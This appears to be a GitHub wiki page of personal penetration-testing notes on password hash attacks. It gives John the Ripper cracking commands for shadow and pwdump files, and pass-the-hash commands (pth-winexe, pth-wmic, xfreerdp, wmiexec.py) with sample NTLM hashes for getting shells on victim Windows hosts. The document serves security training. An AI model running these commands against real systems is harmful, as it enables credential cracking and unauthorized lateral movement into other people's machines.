-
Notifications
You must be signed in to change notification settings - Fork 14
Password hash attack
lethanhtung01011980 edited this page Apr 23, 2020
·
24 revisions
- To crack obtained password hash
- In Kali,
hash-identifier
- Then key in hash
Don't have root/SYSTEM privilege yet. Already have hash of password via LFI or RFI.
- Already known hash type in step 1.
- Sample john for various hash:
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
- Backup link: https://github.com/lethanhtung01011980/Notes/wiki/john
john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 10.10.10.11.hash
Need to put a * in front of hash for mysql-sha1?
john --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1 10.10.10.11.hash
Need to get hash dump from pwdump and fgdump
- pwdump from Windows:
john 127.0.0.1.pwdump
- Use with wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
- Use with wordlist + mutation:
john --rules --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
Have the content of /etc/passwd and /etc/shadow in password.txt and shadow.txt
-
Should be MD5 ($1 in /etc/shadow)
-
unshadow 141-password.txt 141-shadow.txt > 141-unshadow.txt
-
john --rules --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt
-
25 nodes: john --rules --fork=25 --wordlist=/usr/share/wordlists/rockyou.txt 141-unshadow.txt
NTLM/LM password hashes are not salted and remain static between sessions and copmuters
- We copy the local administrator NTLM hash of hacked machine
- Use this discovered hash with a patched pth-winexe to gain a shell on a different machine
- which has the same local administrator / password combination.
- /usr/bin/pth-winexe
pth in Kali
- Ref: https://www.hacklikeapornstar.com/all-pth-techniques/
- /usr/bin/pth*
- pth-net: executes net commands (net user, net share) on remote hosts
- pth-rpcclient: opens an interactive session to execute RPC commands
- pth-smbclient: browses available shares on remote computers
- pth-winexe: executes interactively a command on remote computers
- pth-wmic: executes WMI queries on remote computers
- pth-wmis: executes a command using WMI on remote computers
RCE in cmd.exe
pth-winexe -U WORKGROUP/Administrator%hash:hash //victim-ip cmd.exe
- Example:
pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
Other examples
pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
Remote desktop using hash For Windows 2012 R2 and Windows 8.1 victim
- apt-get update
- apt-get install freerdp-x11
xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
Already installed in Kali
- If port SMB 445 is open.
- wmiexec.py -hashes hash1:hash2 administrator@victim-ip
- Without LM is still working:
wmiexec.py -hashes :XXXXX7A37513BXXXX08952XXXX522B administrator@victim-ip